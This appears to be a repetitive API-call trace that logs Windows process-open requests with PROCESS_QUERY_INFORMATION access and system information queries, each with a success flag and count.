Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
